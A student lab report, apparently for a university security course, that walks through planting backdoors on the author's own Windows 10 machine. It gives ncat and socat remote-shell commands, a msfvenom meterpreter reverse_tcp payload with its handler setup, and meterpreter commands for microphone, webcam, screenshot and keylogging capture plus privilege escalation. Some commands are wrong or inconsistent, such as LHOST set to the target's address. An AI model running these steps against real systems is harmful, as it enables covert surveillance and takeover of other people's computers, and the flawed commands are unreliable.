Exp2 后门原理与实践
20155332《网络对抗》Exp2 后门原理与实践
1.实验环境
- 主机一台联想台式机,安装有win10系统 。
- 安装的kali虚拟机为攻击机。
- 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了)
- win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。
- win10的IP是172.16.2.29,kali虚拟机的IP是192.168.114.129.
2.实验内容 (3.5分)
- (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
- (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
- (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
- (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
- (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
3.实验步骤
3.1使用netcat获取主机操作Shell,cron启动
1.在win10的cmd里,进入D:\ncat\ncat,输入ncat -l -e cmd.exe -p 53
2.在kali的终端里,输入nc 172.16.2.29 53
连接win10,获得shell权限
3.2使用socat获取主机操作Shell, 任务计划启动
1.在win10靶机中点击控制面板->系统和安全->管理工具->任务计划程序,话不多说,上图。
在操作选项卡中绑定socat程序,给出参数 tcp-listen:5332exec:cmd.exe,pty,stderr
右键5332进程,然后启动就行。
2.在kali虚拟机中,socat - tcp:172.16.2.29:5332
,就可以获得win10的shell权限了
3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali虚拟机中用Meterpreter生成后门。
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.29 LPORT=5332 -f exe > backdoor.exe
2.把这个后门用ncat
传送到靶机上。
kali:ncat -l 5332 < backdoor.exe
nc 172.16.2.29 > backdoor.exe
3.开启后门
- 在kali虚拟机终端输入
msfconsole
- 接着输入
use exploit/multi/handler
- 输入
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.2.29
set LPORT 5332
show options
exploit
4.开始窃取个人隐私
- 输入
shell
,获得windows 命令行
3.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
-
输入
record_mic
获取音频 -
webcam_snap
打开摄像头 -
screenshot
截屏
keyscan_start
开始键盘记录keyscan_dump
导出键盘记录
5.尝试提权
输入getsystem
提权,但是失败了。
4.基础问题回答
- (1)例举你能想到的一个后门进入到你系统中的可能方式?
答:太多了。作为《机要风云》的演员之一,我饰演的机要员小刘的电脑就被黑客植入过后门。
捆绑软件可以把后门和应用软件捆绑在一起,让我下载,进入我的系统。
浏览网页的时候,一些弹窗会自动下载恶意软件。
用一些破解软件,比如我的office就是用小马KMS激活的,可能就在电脑留下了后门。
有人趁我不注意用U盘拷到我的电脑里。
- (2)例举你知道的后门如何启动起来(win及linux)的方式?
伪装成正规软件,双击就可以启动。
或者设置为开机自启动。
- (3)Meterpreter有哪些给你映像深刻的功能?
可以打开电脑的摄像头,可以直播。去年参加微视演绎的时候,学姐给我电脑里植入的后门,打开了我的摄像头,我感到震惊。毕竟自己笔记本电脑的摄像头从来没用过,然后就被别人控制了,太可怕了。现在我终于知道了这个其实并不难。
- (4)如何发现自己有系统有没有被安装后门?
用windows defender对电脑进行实时防护。
做实验的时候我只有把他关了才能运行这个后门程序。一打开Windows defender就会提醒电脑有恶意病毒,然后就把它删了。
所以,自带的杀毒软件还是不错的。